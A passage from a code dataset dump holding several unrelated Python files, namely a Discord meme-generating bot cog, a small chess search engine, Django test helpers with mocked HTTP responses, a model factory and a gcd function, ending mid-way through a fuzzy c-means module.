goes on\n regex = r'?'\n\n regex = re.compile(regex, re.IGNORECASE)\n\n if re.fullmatch(regex, argument.split(' ')[0]):\n img = await download(argument.split(' ')[0].strip('<>'))\n\n img = Image.open(img)\n\n text = ' '.join(argument.split(' ')[1:])\n if not text:\n raise commands.BadArgument('No text supplied for image')\n return img.convert('RGBA'), text\n else:\n raise commands.BadArgument(\n \"That URL doesn't seem to lead to a valid image\"\n )\n\n\nclass LinkOrAvatar(commands.Converter):\n special_cases = {\n 'itsthejoker': 'https://avatars0.githubusercontent.com/u/5179553'\n }\n\n async def convert(self, ctx, argument):\n try:\n possible_member = await commands.MemberConverter() \\\n .convert(ctx, argument)\n if possible_member.name not in self.special_cases:\n url = possible_member.avatar_url_as(format='png')\n url = url.replace('gif', 'png').strip('<>')\n else:\n url = self.special_cases[possible_member.name]\n\n img = await download(url)\n\n img = Image.open(img)\n\n return img.convert('RGBA'), possible_member.name\n except commands.BadArgument:\n pass\n\n # from https://stackoverflow.com/questions/169625/\n # regex-to-check-if-valid-url-that-ends-in-jpg-png-or-gif\n # (Sorry about breaking the URL)\n\n # will add more image formats as time goes on\n regex = r'?'\n\n regex = re.compile(regex, re.IGNORECASE)\n\n if re.fullmatch(regex, argument.split(' ')[0]):\n img = await download(argument.split(' ')[0].strip('<>'))\n\n img = Image.open(img)\n\n text = ' '.join(argument.split(' ')[1:])\n if not text:\n raise commands.BadArgument('No text supplied for image')\n return img.convert('RGBA'), text\n else:\n raise commands.BadArgument(\n \"That URL doesn't seem to lead to a valid image\"\n # if possible_member else \"I couldn't find that user\"\n )\n\n\nclass Other:\n def __init__(self, bot):\n self.bot = bot\n\n @staticmethod\n async def __error(ctx, err):\n if isinstance(err, commands.BadArgument):\n await ctx.send(err)\n\n @commands.command()\n async def forum(self, ctx, *, search):\n \"\"\"Search the Swift Discourse Forum for anything.\"\"\"\n with aiohttp.ClientSession() as s:\n async with s.get(\n 'https://forums.swift.org/search/query.json',\n params={'term': search}\n ) as r:\n r = await r.json()\n\n if r['grouped_search_result'] is None:\n return await ctx.send('No results found.')\n\n data = []\n\n # I'm sorry. (Ok not as bad now)\n\n # idk why, but topics seems to disappear sometimes\n data.extend([(f't/{t[\"id\"]}', t['title'])\n for t in r.get('topics', [])])\n\n data.extend([(f'u/{u[\"username\"]}',\n f'{u[\"username\"]} ({u[\"name\"]})')\n for u in r['users']])\n\n data.extend([(f'c/{c.id}', c['name'])\n for c in r['categories']])\n\n data.extend([(f'tags/{t[\"name\"]}', t['name'])\n for t in r['tags']])\n\n data.extend([(f'p/{p[\"id\"]}', p['blurb'])\n for p in r['posts']])\n\n if not data:\n return await ctx.send('No results found.')\n\n p = Pages(\n ctx,\n entries=[f'[{d[1]}](https://forums.swift.org/{d[0]})'\n for d in data]\n )\n\n await p.paginate()\n\n # noinspection PyUnresolvedReferences,PyPep8Naming\n @commands.command()\n async def blame(self, ctx, *, img: AvatarOrOnlineImageOrText = None):\n \"\"\"Blame everyone! Defaults to perryprog.\n\n Will also accept image urls ending in jpg, png, and jpeg.\"\"\"\n # hardcoded because I want to be blamed even in forks ;)\n img, name = img or await LinkOrAvatar() \\\n .convert(ctx, '280001404020588544')\n # special cases for usernames\n special_cases = {\n 'perryprog': 'perry',\n 'itsthejoker': 'joker'\n }\n\n # :no_entry: emoji\n emoji = 'https://emojipedia-us.s3.amazonaws.com/thumbs/240/twitter/' \\\n '120/no-entry-sign_1f6ab.png'\n emoji = await download(emoji)\n emoji = Image.open(emoji)\n emoji = emoji.convert('RGBA')\n\n # make the image 3 times larger than the avatar\n large_image = Image.new('RGBA', [3 * x for x in img.size], (0,) * 4)\n lW, lH = large_image.size\n W, H = img.size\n # the center box for the avatar\n box = (W, H, W * 2, H * 2)\n\n # make the emoji 20% bigger than the avatar\n emoji = emoji.resize([floor(x * 1.2) for x in img.size])\n eW, eH = emoji.size\n\n large_image.paste(img.copy(), box)\n large_image.paste(\n emoji,\n\n ( # center the emoji\n floor((lW - eW) / 2),\n\n floor((lH - eH) / 2)\n ),\n\n emoji\n )\n\n # make the font size relative to the avatar size\n fnt = ImageFont.truetype('Arial.ttf', floor(img.size[0] / 4))\n d = ImageDraw.Draw(large_image)\n\n name = special_cases.get(\n name,\n re.sub(r'\\W', '', name).lower()\n )\n\n message = f'#blame{name}'\n tW, tH = d.textsize(message, fnt)\n\n d.text(\n ( # center the text\n floor((lW - tW) / 2),\n # make the text somewhat centered (a bit offset so it\n # looks good) in the first \"row\"\n floor(H / 2) - floor(W / 4)\n ),\n message,\n font=fnt,\n fill=(255,) * 4\n )\n\n bio = io.BytesIO()\n large_image.save(bio, 'PNG')\n bio.seek(0)\n await ctx.send(file=discord.File(bio, filename='blame.png'))\n\n # noinspection PyPep8Naming,PyUnresolvedReferences\n @commands.command(aliases=['floor'])\n async def the_floor(self, ctx, img: AvatarOrOnlineImageOrText, *, what):\n \"\"\"Generate a the floor is lava meme.\"\"\"\n\n img, _ = img\n\n if len(what) > 179:\n return await ctx.send(\"The floor isn't that long. (max 179 chars)\")\n\n meme_format = Image.open('memes/floor.png')\n\n # == Text ==\n fnt = ImageFont.truetype('Arial.ttf', 30)\n d = ImageDraw.Draw(meme_format)\n\n margin = 20\n offset = 25\n for line in textwrap.wrap(f'The floor is {what}', width=65):\n d.text((margin, offset), line, font=fnt, fill=(0,) * 3)\n offset += fnt.getsize(line)[1]\n\n # == Avatars ==\n first = img.resize((20, 20))\n second = img.resize((40, 40))\n\n meme_format.paste(first, (143, 135))\n meme_format.paste(second, (465, 133))\n\n # == Sending ==\n bio = io.BytesIO()\n meme_format.save(bio, 'PNG')\n bio.seek(0)\n await ctx.send(file=discord.File(bio, filename='floor.png'))\n\n # noinspection PyUnresolvedReferences\n @commands.command(aliases=['car'])\n async def highway(self, ctx, img: AvatarOrOnlineImageOrText,\n first_option, *, second_option):\n \"\"\"Generate a \"Left Exit 12 Off Ramp\" meme.\"\"\"\n\n img, _ = img\n\n if len(first_option) > 54 or len(second_option) > 54:\n return await ctx.send(\"Your options can't be that long. (Max 54)\")\n\n meme_format = Image.open('memes/highway.jpg')\n\n # == Text one ==\n fnt = ImageFont.truetype('Arial.ttf', 22)\n d = ImageDraw.Draw(meme_format)\n\n margin = 165\n offset = 80\n for line in textwrap.wrap(first_option, width=9):\n d.text((margin, offset), line, font=fnt, fill=(255,) * 3)\n offset += fnt.getsize(line)[1]\n\n # == Text two ==\n\n margin = 380\n offset = 80\n for line in textwrap.wrap(second_option, width=9):\n d.text((margin, offset), line, font=fnt, fill=(255,) * 3)\n offset += fnt.getsize(line)[1]\n\n # == Image ==\n meme_format.paste(img.resize((50, 50)), (340, 430))\n\n # == Sending ==\n bio = io.BytesIO()\n meme_format.save(bio, 'PNG')\n bio.seek(0)\n await ctx.send(file=discord.File(bio, filename='floor.png'))\n\n @commands.command()\n async def wheeze(self, ctx, *, message: str):\n \"\"\"Generate a wheeze meme.\"\"\"\n\n if len(message) > 10:\n return await ctx.send(\n \"Can't do more than 10 characters because reasons\"\n )\n\n meme_format = Image.open('memes/wheeze.png')\n\n # == Text ==\n fnt = ImageFont.truetype('Arial.ttf', 20)\n d = ImageDraw.Draw(meme_format)\n\n d.text((34, 483), message, font=fnt, fill=(0,) * 3)\n\n # == Sending ==\n bio = io.BytesIO()\n meme_format.save(bio, 'PNG')\n bio.seek(0)\n await ctx.send(file=discord.File(bio, filename='wheeze.png'))\n\n # noinspection PyUnresolvedReferences\n @commands.command(aliases=['garbage'])\n async def trash(self, ctx, first: AvatarOrOnlineImage,\n *, second: AvatarOrOnlineImage):\n \"\"\"Generate a taking out the trash meme.\"\"\"\n\n if isinstance(first, str):\n if len(first) > 6:\n return await ctx.send(\n \"Can't do more than 6 characters because reasons\"\n )\n\n if isinstance(second, str):\n if len(second) > 25:\n return await ctx.send(\n \"Can't do more than 6 characters because reasons\"\n )\n\n meme_format = Image.open('memes/garbage.jpg')\n meme_format = meme_format.convert('RGBA')\n\n # == Text/Avatars 1==\n if isinstance(first, str):\n fnt = ImageFont.truetype('Arial.ttf', 50)\n d = ImageDraw.Draw(meme_format)\n\n margin = 440\n offset = 35\n for line in textwrap.wrap(first, width=4):\n d.text((margin, offset), line, font=fnt, fill=(255,) * 3)\n offset += fnt.getsize(line)[1]\n else:\n first = first.resize((180, 180))\n first = first.rotate(20, expand=True)\n meme_format.paste(first, (390, 15), first)\n\n # == Text/Avatars 2 ==\n if isinstance(second, str):\n fnt = ImageFont.truetype('Arial.ttf', 50)\n d = ImageDraw.Draw(meme_format)\n\n margin = 720\n offset = 170\n for line in textwrap.wrap(second, width=5):\n d.text((margin, offset), line, font=fnt, fill=(0,) * 3)\n offset += fnt.getsize(line)[1]\n else:\n second = second.resize((250, 250))\n second = second.rotate(-10, expand=True)\n meme_format.paste(second, (620, 150), second)\n\n # == Sending ==\n bio = io.BytesIO()\n meme_format.save(bio, 'PNG')\n bio.seek(0)\n await ctx.send(file=discord.File(bio, filename='floor.png'))\n\n @commands.command()\n async def captcha(self, ctx, img: AvatarOrOnlineImageOrText,\n *, message=None):\n \"\"\"Generate a select all \"\"\"\n\n img, name = img\n name = re.sub(r'\\W', '', name).lower()\n name = message or name\n\n meme_format = Image.open('memes/captcha.png')\n\n # == Images ==\n img = img.resize((129, 129))\n\n for x_mul in range(3):\n for y_mul in range(3):\n meme_format.paste(img, (27 + 129 * x_mul, 173 + 129 * y_mul))\n\n # == Text ==\n fnt = ImageFont.truetype('Arial.ttf', 30)\n d = ImageDraw.Draw(meme_format)\n\n d.text((51, 90), name, font=fnt, fill=(255,) * 3)\n\n # == Sending ==\n bio = io.BytesIO()\n meme_format.save(bio, 'PNG')\n bio.seek(0)\n await ctx.send(file=discord.File(bio, filename='floor.png'))\n\n @commands.command('spam')\n async def who_did_this(self, ctx, search=3):\n \"\"\"Find out who spammed a help command.\n\n Specifically for the dbots server.\n\n Search is how far to go before hitting a bot.\"\"\"\n final_results = []\n\n async for m in ctx.channel.history(limit=search):\n if m.author.bot:\n # We probably found the end of the train\n async for bot_m in ctx.channel.history(before=m):\n if not bot_m.author.bot:\n # Start of the train\n final_results.append((bot_m.author, bot_m.content))\n async for others_m in ctx.channel.history(\n limit=5, before=bot_m\n ):\n final_results.append(\n (others_m.author, others_m.content)\n )\n return await ctx.send(\n '\\n'.join(\n f'**{commands.clean_content().convert(r[0].display_name)}:** {commands.clean_content().convert(r[1])}'\n for r in final_results\n )\n )\n\n\ndef setup(bot):\n bot.add_cog(Other(bot))\n","sub_path":"cogs/other.py","file_name":"other.py","file_ext":"py","file_size_in_byte":16176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"553145147","text":"\nfrom itertools import chain\n\nimport pst\n\n\n# some symbols\nup = -10\ndn = 10\nrt = 1\nlt = -1\n\nE = []\nP = [up, up * 2, up + lt, up + rt]\nN = [up * 2 + rt, up + rt * 2, dn + rt * 2, dn * 2 + rt,\n dn * 2 + lt, dn + lt * 2, up + lt * 2, up * 2 + lt]\nB = [up + rt, dn + rt, dn + lt, up + lt]\nR = [up, rt, dn, lt]\nQ = [up, up + rt, rt, dn + rt, dn, dn + lt, lt, up + lt]\nK = Q\n\nempty = ['.']\nborder = [' ', '\\n']\nray = ['.', 'p', 'n', 'b', 'r', 'q', 'k']\n\nr64 = list(\n chain(\n range(21, 29), range(31, 39),\n range(41, 49), range(51, 59),\n range(61, 69), range(71, 79),\n range(81, 89), range(91, 99)\n )\n)\n\nvec = {\n ' ': E, '.': E, '\\n': E,\n 'p': E, 'n': E, 'b': E, 'r': E, 'q': E, 'k': E,\n 'P': P, 'N': N, 'B': B, 'R': R, 'Q': Q, 'K': K\n}\n\nmat = {\n ' ': 0, '.': 0, '\\n': 0,\n 'p': -pst.P, 'n': -pst.N,\n 'b': -pst.B, 'r': -pst.R,\n 'q': -pst.Q, 'k': -pst.K,\n 'P': pst.P, 'N': pst.N,\n 'B': pst.B, 'R': pst.R,\n 'Q': pst.Q, 'K': pst.K\n}\n\npiece = {\n ' ': E, '.': E, '\\n': E,\n 'p': pst.bpawn, 'n': pst.bknight,\n 'b': pst.bbishop, 'r': pst.brook,\n 'q': pst.bqueen, 'k': pst.bking,\n 'P': pst.wpawn, 'N': pst.wknight,\n 'B': pst.wbishop, 'R': pst.wrook,\n 'Q': pst.wqueen, 'K': pst.wking\n}\n\noff = 96\nrow = 10\n\n# node constructor\n\n\nclass Node():\n\n def __init__(self,b=None,mov=None):\n if b == None:\n self.b =\\\n \" \\n\" * 2 +\\\n \" rnbqkbnr\\n\" +\\\n \" pppppppp\\n\" +\\\n \" ........\\n\" * 4 +\\\n \" PPPPPPPP\\n\" +\\\n \" RNBQKBNR\\n\" +\\\n \" \\n\" * 2\n else:\n self.b = b\n self.mov = mov\n self.double = []\n self.passant = None\n self.castle = []\n self.score = 0\n\n\n\ndef flip(b):\n b = list(b[::-1])\n for x in range(0, len(b)):\n if x % 10 == 0:\n b[x] = \" \"\n if (x - 9) % 10 == 0:\n b[x] = \"\\n\"\n b[x] = b[x].upper() if b[x].islower() else b[x].lower()\n return ''.join(b)\n\n\ndef take_move(node, mov):\n b1 = node.b[0:mov[1]] + node.b[mov[0]] + node.b[mov[1] + 1:len(node.b)]\n return b1[0:mov[0]] + '.' + b1[mov[0] + 1:len(b1)]\n\n\n# for search\n# it=list(range(0,120))\n\n\ndef gen(c, node, pos):\n r = []\n if c in ['P']:\n if node.b[pos + up] in empty:\n r.append(vec[c][0])\n if pos in range(81, 89) and node.b[pos + up] in empty\\\n and node.b[pos + up * 2] in empty:\n r.append(vec[c][1])\n if node.b[pos + up + lt].islower():\n r.append(vec[c][2])\n if node.b[pos + up + rt].islower():\n r.append(vec[c][3])\n elif c in ['N', 'K']:\n for x in range(0, len(vec[c])):\n if node.b[pos + vec[c][x]] in empty or\\\n node.b[pos + vec[c][x]].islower():\n r.append(vec[c][x])\n elif c in ['B', 'R', 'Q']:\n for x in range(0, len(vec[c])):\n y = 1\n while node.b[pos + vec[c][x] * y] in ray:\n if node.b[pos + vec[c][x] * y] == '.':\n r.append(vec[c][x] * y)\n elif node.b[pos + vec[c][x] * y].islower():\n r.append(vec[c][x] * y)\n break\n else:\n break\n y += 1\n return r\n\n\ndef generate(node):\n return [(x, x + y) for x in r64 for y in gen(node.b[x], node, x)]\n\n\ndef order(par, g, turn, d):\n n = []\n for x in range(len(g)):\n n.append(Node(take_move(par, g[x]), g[x]))\n #ha.update(n[x].b.encode('utf-8'))\n try:\n n[x].score = trans[n[x].b]\n if turn == False:\n n[x].score *= (-1)\n except KeyError:\n n[x].score = mscore(n[x]) + pscore(n[x])\n\n trans[n[x].b] = n[x].score\n return sorted(n, key=lambda x: x.score, reverse=turn)\n\n\ndef mscore(node):\n return sum(list(map(lambda char: mat[char], node.b)))\n\n\ndef pscore(node):\n score = 0\n for x in range(0, len(node.b)):\n if x in r64 and node.b[x] not in empty + border:\n score += piece[node.b[x]][x]\n return score\n\n\ndef ab(node, depth, a, b, turn):\n global ncount, max_count\n if depth == 0:\n ncount += 1\n try:\n score = trans[node.b]\n if turn == False:\n score *= (-1)\n except KeyError:\n score = mscore(node) + pscore(node)\n #print(score)\n\n trans[node.b] = score\n return score\n g = order(node, generate(node), turn, depth)\n if turn:\n v = -pst.K * 3\n bmove = g[0].mov\n for x in g:\n if ncount >= max_count:\n return (v, bmove) if depth == max_depth else v\n v = max(v, ab(x, depth - 1, a, b, not turn))\n if v > a:\n a = v\n if depth == max_depth:\n bmove = x.mov\n if b <= a:\n break\n return (v, bmove) if depth == max_depth else v\n else:\n v = pst.K * 3\n bmove = g[0].mov\n for x in g:\n if ncount >= max_count:\n return (v, bmove) if depth == max_depth else v\n v = min(v, ab(x, depth - 1, a, b, not turn))\n if v < b:\n b = v\n if depth == max_depth:\n bmove = x.mov\n if b <= a:\n break\n return (v, bmove) if depth == max_depth else v\n\n\ndef mtdf(root, f, d):\n global ncount, max_count\n g = f\n upper = pst.Q\n lower = -pst.Q\n while lower < upper:\n b = g + 1 if g == lower else g\n result = ab(root, d, b - 1, b, True)\n if ncount >= max_count:\n return result\n g = result[0]\n if g < b:\n upper = g\n else:\n lower = g\n return result\n\n\n# I/O\n\n\ndef your_move():\n return input(\"your move: \").lower()\n\n\ndef ai_move():\n pass\n\n\ndef io_to_co(io):\n return ((ord(io[0]) - off) + ((row - int(io[1])) * row), (ord(io[2]) - off) + ((row - int(io[3])) * row))\n\n# main logic\nbest_move = None\ntrans = {}\nmax_depth = 7\nroot = Node()\nturn = True\ncounter = 0\nmax_count = 10e3\n\n\nwhile True:\n\n if turn == True:\n ncount = 0\n ai=mtdf(root, 0, max_depth)\n #ai = ab(root, max_depth, -pst.K*3, pst.K*3, turn)\n root.b = take_move(root, ai[1])\n print(root.b)\n turn = not turn\n counter += 1\n\n elif turn == False:\n ncount = 0\n root.b = flip(root.b)\n ai=mtdf(root, 0, max_depth)\n #ai = ab(root, max_depth, -pst.K, pst.K, turn)\n root.b = flip(take_move(root, ai[1]))\n print(root.b)\n turn = not turn\n counter += 1\n\n if counter == 8:\n break\n","sub_path":"chess.py","file_name":"chess.py","file_ext":"py","file_size_in_byte":6756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"629480355","text":"import os\n\ncurrentpath = os.path.abspath('.')\n\ntestDir = os.path.join(currentpath,'testDir')\nos.mkdir(testDir)\n#os.rmdir(testDir)\nfilepath = os.path.abspath('test.txt')\nfileNewPath = os.path.join(testDir,os.path.split(filepath)[1])\n\n\nf = open(fileNewPath,'w')\n\nwith open('test.txt','r') as f1:\n\tf.write(f1.read())\n\n\n","sub_path":"pythonBase/fileDir.py","file_name":"fileDir.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"371531441","text":"from contextlib import contextmanager\nfrom functools import partial\nimport urlparse\n\nfrom django.core.cache import get_cache\nfrom django.core.handlers.wsgi import WSGIHandler\nfrom django.test.signals import template_rendered\nfrom django.test.client import RequestFactory, store_rendered_templates\nfrom mock import patch\nfrom unittest2 import TestCase\nfrom webtest import TestApp\n\nfrom .builder import ListBuilder\nfrom .core.builders import companies\nfrom .environments.builders import environments\nfrom .products.builders import products\nfrom .responses import response, make_identity, make_error\nfrom .static.builders import codevalues\nfrom .users.builders import users\n\n\n\ndef fill_cache(cache, values_dict):\n \"\"\"\n Fill a mock cache object with some keys and values.\n\n \"\"\"\n cache.get.side_effect = lambda k, d=None: values_dict.get(k, d)\n\n\n\ndef setup_responses(http, response_dict):\n \"\"\"\n Setup a mock http object with some responses to given\n URLs. ``response_dict`` should map full URLs (including query string) to\n the (response, content) tuple that will be returned (equivalent to the\n return value of the httplib2.Http.request method).\n\n \"\"\"\n url_dict = dict((Url(k), v) for k, v in response_dict.iteritems())\n def request(*args, **kwargs):\n uri = Url(kwargs[\"uri\"])\n try:\n return url_dict[uri]\n except KeyError:\n return response(\n make_error(\n \"Mock got unexpected request URI: %s \\n\"\n \" -- Options are %s --\" % (uri, response_dict.keys())\n ),\n 500)\n\n http.request.side_effect = request\n\n\nCOMMON_RESPONSES = {\n \"http://fake.base/rest/companies/1?_type=json\":\n response(companies.one(\n resourceIdentity=make_identity(id=1, url=\"companies/1\"))),\n \"http://fake.base/rest/users?_type=json\":\n response(users.searchresult({})),\n \"http://fake.base/rest/users/current?_type=json\":\n response(users.one()),\n \"http://fake.base/rest/products?_type=json\":\n response(products.searchresult({})),\n \"http://fake.base/rest/environments?_type=json\":\n response(environments.searchresult({}, {})),\n \"http://fake.base/staticData/values/TESTCYCLESTATUS?_type=json\":\n response(codevalues.array(\n {\"description\": \"DRAFT\", \"id\": 1},\n {\"description\": \"ACTIVE\", \"id\": 2},\n {\"description\": \"LOCKED\", \"id\": 3},\n {\"description\": \"CLOSED\", \"id\": 4},\n {\"description\": \"DISCARDED\", \"id\": 5},\n )),\n \"http://fake.base/staticData/values/TESTRUNSTATUS?_type=json\":\n response(codevalues.array(\n {\"description\": \"DRAFT\", \"id\": 1},\n {\"description\": \"ACTIVE\", \"id\": 2},\n {\"description\": \"LOCKED\", \"id\": 3},\n {\"description\": \"CLOSED\", \"id\": 4},\n {\"description\": \"DISCARDED\", \"id\": 5},\n )),\n \"http://fake.base/staticData/values/TESTCASESTATUS?_type=json\":\n response(codevalues.array(\n {\"description\": \"DRAFT\", \"id\": 1},\n {\"description\": \"ACTIVE\", \"id\": 2},\n {\"description\": \"LOCKED\", \"id\": 3},\n {\"description\": \"CLOSED\", \"id\": 4},\n {\"description\": \"DISCARDED\", \"id\": 5},\n )),\n \"http://fake.base/staticData/values/TESTRUNRESULTSTATUS?_type=json\":\n response(codevalues.array(\n {\"description\": \"PENDING\", \"id\": 1},\n {\"description\": \"PASSED\", \"id\": 2},\n {\"description\": \"FAILED\", \"id\": 3},\n {\"description\": \"BLOCKED\", \"id\": 4},\n {\"description\": \"STARTED\", \"id\": 5},\n {\"description\": \"INVALIDATED\", \"id\": 6},\n )),\n \"http://fake.base/staticData/values/APPROVALSTATUS?_type=json\":\n response(codevalues.array(\n {\"description\": \"PENDING\", \"id\": 1},\n {\"description\": \"APPROVED\", \"id\": 2},\n {\"description\": \"REJECTED\", \"id\": 3},\n )),\n \"http://fake.base/staticData/values/ATTACHMENTTYPE?_type=json\":\n response(codevalues.array(\n {\"description\": \"BRANDING\", \"id\": 1},\n {\"description\": \"DESIGN\", \"id\": 2},\n {\"description\": \"USERGUIDE\", \"id\": 3},\n {\"description\": \"REQUIREMENTS\", \"id\": 4},\n {\"description\": \"KNOWNISSUES\", \"id\": 5},\n {\"description\": \"SCREENCAPTURE\", \"id\": 6},\n {\"description\": \"NDA\", \"id\": 7},\n {\"description\": \"UNSPECIFIED\", \"id\": 8},\n )),\n }\n\n\ndef setup_common_responses(http, response_dict):\n \"\"\"\n A version of ``setup_responses`` intended for end-to-end request-response\n testing. Automatically knows how to respond to the StaticCompanyMiddleware\n query for the current company, and to static data requests.\n\n \"\"\"\n new_dict = COMMON_RESPONSES.copy()\n new_dict.update(response_dict)\n return setup_responses(http, new_dict)\n\n\n\n@contextmanager\ndef locmem_cache():\n cache = get_cache(\"django.core.cache.backends.locmem.LocMemCache\")\n cache.clear()\n patcher = patch(\"ccui.core.cache.cache\", cache)\n patcher.start()\n yield cache\n patcher.stop()\n\n\n\nclass CachingFunctionalTestMixin(object):\n def setUp(self):\n self.cache = get_cache(\"django.core.cache.backends.locmem.LocMemCache\")\n self.cache.clear()\n self.patcher = patch(\"ccui.core.cache.cache\", self.cache)\n self.patcher.start()\n self.addCleanup(self.patcher.stop)\n\n\n\ndef creds(email, password=None, cookie=None):\n from ccui.users.auth import UserCredentials\n from ccui.users.models import User\n creds = UserCredentials(email, password=password, cookie=cookie)\n creds._user = User(email=email)\n creds._user.auth = creds\n creds._permission_codes = []\n return creds\n\n\n\nclass AuthTestCase(TestCase):\n def creds(self, email, password=None, cookie=None):\n return creds(email, password, cookie)\n\n\n @property\n def auth(self):\n \"\"\"\n Since the server responses are mocked, we could just ignore auth when\n not testing it specifically, but we include it for all requests to more\n closely match real usage.\n\n \"\"\"\n return self.creds(\"admin@example.com\", cookie=\"USERTOKEN: authcookie\")\n\n\n\nclass ViewTestCase(AuthTestCase):\n factory = RequestFactory()\n\n\n def setUp(self):\n self.rendered = {}\n on_template_render = partial(store_rendered_templates, self.rendered)\n template_rendered.connect(on_template_render)\n self.addCleanup(template_rendered.disconnect, on_template_render)\n\n\n def setup_responses(self, http, response_dict=None, user=None):\n if user is None:\n user = self.auth.user\n if response_dict is None:\n response_dict = {}\n else:\n response_dict = response_dict.copy()\n response_dict.setdefault(\n \"http://fake.base/rest/users/current?_type=json\",\n response(\n users.one(\n email=user.email,\n firstName=user.firstName,\n lastName=user.lastName,\n screenName=user.screenName\n )\n )\n )\n setup_common_responses(http, response_dict)\n\n\n @property\n def app(self):\n class AuthWSGIHandler(WSGIHandler):\n def get_response(self_, request):\n request._cached_user = self.auth.user\n request._cached_auth = self.auth\n return super(AuthWSGIHandler, self_).get_response(request)\n return TestApp(AuthWSGIHandler())\n\n\n\nclass ResourceTestCase(AuthTestCase):\n @property\n def resource_class(self):\n if not hasattr(self, \"_resource_class\"):\n self._resource_class = self.get_resource_class()\n\n return self._resource_class\n\n\n def get_resource_class(self):\n raise NotImplementedError\n\n\n @property\n def resource_list_class(self):\n if not hasattr(self, \"_resource_list_class\"):\n self._resource_list_class = self.get_resource_list_class()\n\n return self._resource_list_class\n\n\n def get_resource_list_class(self):\n raise NotImplementedError\n\n\n def assertSameResource(self, res1, res2):\n self.assertEqual(res1._location, res2._location)\n\n\n def assertSameResourceList(self, list1, list2):\n self.assertEqual(\n [r._location for r in list1],\n [r._location for r in list2],\n )\n\n\n\nclass TestResourceTestCase(ResourceTestCase):\n builder = ListBuilder(\n \"testresource\",\n \"testresources\",\n \"Testresource\",\n { \"name\": \"Default name\" })\n\n\n def get_resource_class(self):\n from ccui.core.api import RemoteObject, fields\n\n def filter_callable(vals):\n return (\"callableFilter\", [v+\"foo\" for v in vals])\n\n class TestResource(RemoteObject):\n name = fields.Field()\n submit_as = fields.Field(api_name=\"submitAs\")\n\n non_field_filters = {\n \"non_field\": \"nonField\",\n \"callable\": filter_callable,\n }\n\n cache = False\n\n def __unicode__(self_):\n return u\"__unicode__ of %s\" % self_.name\n\n return TestResource\n\n\n def get_resource_list_class(self):\n from ccui.core.api import ListObject, fields\n\n class TestResourceList(ListObject):\n entryclass = self.resource_class\n api_name = \"testresources\"\n default_url = \"testresources\"\n\n entries = fields.List(fields.Object(self.resource_class))\n\n cache = False\n\n return TestResourceList\n\n\n\nclass BaseResourceTest(object):\n \"\"\"\n Generic smoke tests that will be run for all resource types.\n\n \"\"\"\n pass\n\n\n\nclass Url(object):\n \"\"\"\n A wrapper class for comparing urls with querystrings while avoiding\n dict-ordering dependencies. Order of keys in querystring should not matter,\n although order of multiple values for a single key does matter.\n\n \"\"\"\n def __init__(self, url):\n self.url = url\n parts = urlparse.urlparse(url)\n self.non_qs = (\n parts.scheme,\n parts.netloc,\n parts.path,\n parts.params,\n parts.fragment)\n # convert values from lists to tuples for hashability later\n self.qs = tuple(sorted((k, tuple(v)) for k, v\n in urlparse.parse_qs(parts.query).iteritems()))\n\n\n def __eq__(self, other):\n return (self.non_qs == other.non_qs) and (self.qs == other.qs)\n\n\n def __hash__(self):\n return hash((self.non_qs, self.qs))\n\n\n def __repr__(self):\n return \"Url(%s)\" % self.url\n","sub_path":"tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"195632708","text":"from model_selection.model.light_gbm import LightGbmC\nfrom model_selection.model.xgboost import XgbC\n\n\nclass ClassifierModelFactory(object):\n\n MODEL_LIGHET_GBM = 0\n MODEL_XGBOOST = 1\n MODEL_CAT_BOOST = 2\n MODEL_RANDOM_FOREST = 3\n MODEL_GBR = 4\n MODEL_TENSOR_DNN = 5\n MODEL_TENSOR_LR = 6\n MODEL_KNR = 7\n MODEL_EXTRA_TREE = 8\n MODEL_SGD = 9\n MODEL_LINEAR = 10\n MODEL_SVM_LR = 11\n MODEL_SVM_POLY = 12\n MODEL_SVM_RBF = 13\n MODEL_DECISION_TREE = 14\n\n model_name = {MODEL_LIGHET_GBM: 'light_gbm_c_',\n MODEL_XGBOOST: 'xgboost_c_',\n MODEL_CAT_BOOST: 'cat_boost_c_',\n MODEL_RANDOM_FOREST: 'random_forest_c_',\n MODEL_GBR: 'gb_c_',\n MODEL_TENSOR_DNN: 'tf_dnn_c_',\n MODEL_TENSOR_LR: 'tf_lr_c_',\n MODEL_KNR: 'knn_c_',\n MODEL_EXTRA_TREE: 'extra_tree_c_',\n MODEL_DECISION_TREE: 'decision_tree_c_',\n MODEL_LINEAR: 'linear_c',\n MODEL_SVM_LR: 'svm_lr_c_',\n MODEL_SVM_POLY: 'svm_poly_c_',\n MODEL_SVM_RBF: 'svm_brf_c_',\n MODEL_SGD: 'sgd_c_'}\n\n def create_model(self, argument):\n method_name = 'model_' + str(argument)\n method = getattr(self, method_name, lambda: \"nothing\")\n return method()\n\n def model_0(self):\n return LightGbmC()\n\n def model_1(self):\n return XgbC()\n\n def get_model_name(self, argument):\n return self.model_name[argument]\n\n","sub_path":"model_selection/classifier_model_factory.py","file_name":"classifier_model_factory.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"112690189","text":"def gcd(r1, r2):\n\tif r1 <= r2:\n\t\tif r1 == 0:\n\t\t\treturn r2\n\t\telse:\n\t\t\treturn gcd(r2 % r1, r1)\n\telse:\n\t\treturn gcd(r2, r1)\n\nif __name__ == '__main__':\n\tr1 = int(input('en'))\n\tr2 = int(input('sd'))\n\tprint(gcd(r1,r2))","sub_path":"practice/gcd.py","file_name":"gcd.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"460242674","text":"# -*- coding: utf-8 -*-\n\"\"\"Fuzzy C-Means clustering\"\"\"\n\n# Authors: Junyi Li (lijy263@mail2.sysu.edu.cn)\n# License: BSD 3 clause\n# The import part this file is copy from k_means_.py,\n# some functions are not used for now.\nimport numpy as np\n\nfrom ..base import BaseEstimator, ClusterMixin\nfrom ..utils import check_array\nfrom ..utils import check_random_state\n# from ..preprocessing import normalize\n\n\ndef reconstruct_label(labels):\n if len(labels) <= 0:\n return labels\n tmp = []\n for i, xi in 